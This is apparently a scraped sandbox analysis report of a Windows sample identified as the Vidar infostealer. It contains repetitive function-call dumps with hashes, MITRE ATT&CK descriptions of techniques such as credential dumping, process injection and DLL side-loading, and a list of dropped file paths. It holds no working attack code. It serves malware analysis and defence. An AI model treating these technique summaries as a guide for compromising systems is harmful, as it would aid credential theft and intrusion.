malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C4EB2C9,?,?,?,6C4EB127,?,?,?,?,?,?,?,?,?,6C4EAE52), ref: 6C4EB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C4EB127,?,?,?,?,?,?,?,?), ref: 6C4EB74D

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 02c4f069bd9434839da58fdf7f3cfa9dabc5d28799542b6632b9f5b1ff623887
Instruction ID: 49ff123afcbfd73359a1e238ec3f69b761ca42a0fefaa0760a4d29f51df78e47
Opcode Fuzzy Hash: 02c4f069bd9434839da58fdf7f3cfa9dabc5d28799542b6632b9f5b1ff623887
Instruction Fuzzy Hash: 2E51CDB1A053168FDB14CF19C984E6EB7B1FF49306F46852DC85AABB00D731A805CBA9

Function 6C4EDF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C4DFF2A), ref: 6C4EDFFD

Part of subcall function 6C4E90E0: free.MOZGLUE(?,00000000,?,?,6C4EDEDB), ref: 6C4E90FF
Part of subcall function 6C4E90E0: free.MOZGLUE(?,00000000,?,?,6C4EDEDB), ref: 6C4E9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C4DFF2A), ref: 6C4EE04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C4DFF2A), ref: 6C4EE0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C4DFF2A), ref: 6C4EE0FE

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 9220d1363dd7f6fc74379a0f3aa67b492a0267abfefad97830de8149b7993742
Instruction ID: 7dc6bad916e360cec394944a419c3666de0dabd24f3f9409ae4062722411c4f5
Opcode Fuzzy Hash: 9220d1363dd7f6fc74379a0f3aa67b492a0267abfefad97830de8149b7993742
Instruction Fuzzy Hash: C141C3B16042268FEB14CF68C8C0F5A73B2AB4930AF164639D516DBB40E732E945CBD2

Function 6C4F6180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C4F61DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C4F622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C4F6250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4F6292

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 8286f4fd73434fa290e77b2ea620a47f4141ea78fc0fa5960eae6c814fd13c38
Instruction ID: 2678322afce5140b93b86129969e6e41218f1aaaf4a9298ad90aa94fe578ab57
Opcode Fuzzy Hash: 8286f4fd73434fa290e77b2ea620a47f4141ea78fc0fa5960eae6c814fd13c38
Instruction Fuzzy Hash: 9D311471A0060A8FDB04DF2CDC81EEA73E9FB95308F114139C46AC7651EB31E699C750

Function 6C4E6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C4E6EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C4E6EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C4E6F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4E6F5C

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 8bb8b720ec78d8c45c2ede490c4df4f47ffb04c7a7875b8c5fbf5a55d842a939
Instruction ID: 0a5f5305c6c7191c16e9c5e4b692df9f6243dfbe868e3d8a997e8b2e09065af9
Opcode Fuzzy Hash: 8bb8b720ec78d8c45c2ede490c4df4f47ffb04c7a7875b8c5fbf5a55d842a939
Instruction Fuzzy Hash: 1B310471A1060A8FDB04CF2CCC80FAE73E9EB88346F514239D51AC7651EB31EA59C7A0

Function 6C4FB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C4A0A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4FB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C4A0A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4FB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C4A0A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4FB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6C4A0A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4FB67F

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 4f24b7a6ec3920a52255ad424c76c48f0311d8c9b7ea9a26d56a5b3fb563a570
Instruction ID: a2cafecd163b2f2acef9036dd19b06cf6885381f074303aa39812821dbe35b30
Opcode Fuzzy Hash: 4f24b7a6ec3920a52255ad424c76c48f0311d8c9b7ea9a26d56a5b3fb563a570
Instruction Fuzzy Hash: E831B471A012168FEB10DF58C844E5EBBB6FFC2315F168569C8269B701DB31E916CBA2

Function 6C4CF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C4CF611
memcpy.VCRUNTIME140(?,?,?), ref: 6C4CF623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C4CF652
memcpy.VCRUNTIME140(?,?,?), ref: 6C4CF668

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: 75f2da8379d04f39cbf89b07128e553af01b920969ba7a67403de6d0429a8c67
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: 28314B75B00214AFD714CF19CCC0E9E77B5EB88354B148538EA498BB15D635F9458B91

Function 6C4AB940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C4AB96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C4AB99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4AB9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4AB9B9

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: f9ff85ef948253af82c180c4ad5eea0eabe23e368595096bbc322a7a91cb310b
Instruction ID: 976acfaae63beb0d09c12f35a505b3a480a4b4f0988950f075b218d290bf3116
Opcode Fuzzy Hash: f9ff85ef948253af82c180c4ad5eea0eabe23e368595096bbc322a7a91cb310b
Instruction Fuzzy Hash: F0114FB1A002099FCB04DFA9DC84DAFB7F8BF98314B14853AE919D3701D731E9158AA5

Function 6C4E26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4E26C1
free.MOZGLUE(?), ref: 6C4E26E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4E26FF
free.MOZGLUE ref: 6C4E270D

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2a246b52ef3cf0cc752b96335a36f5a803433e41b013a8abb90f7277a50862cb
Instruction ID: c48f35e0549f73994d2d76b7c64c034377f9e80dae9a655a720da4a80676021f
Opcode Fuzzy Hash: 2a246b52ef3cf0cc752b96335a36f5a803433e41b013a8abb90f7277a50862cb
Instruction Fuzzy Hash: 20F0F9B2B012025BE710DF18DC88D4BB3A9EF5525AB120135EA16D3B01EB32F918C6A5

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\KKFBFCAFCBKF\AFCBFI

C:\ProgramData\KKFBFCAFCBKF\AKKKFB

C:\ProgramData\KKFBFCAFCBKF\AKKKFB-shm

C:\ProgramData\KKFBFCAFCBKF\CAAKFI

C:\ProgramData\KKFBFCAFCBKF\DAECAE

C:\ProgramData\KKFBFCAFCBKF\DAKJDH

C:\ProgramData\KKFBFCAFCBKF\DHCGID

C:\ProgramData\KKFBFCAFCBKF\EBKKKE

C:\ProgramData\KKFBFCAFCBKF\HDBGHI

C:\ProgramData\KKFBFCAFCBKF\HIIIJD

Windows Analysis Report
file.exe

Function 01001FE0 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 433
memoryCOMMON

Function 0101A39E Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Function 01015C98 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 01018B7C Relevance: 4.7, APIs: 3, Instructions: 202
COMMON

Function 01010C0A Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 0101A0F8 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre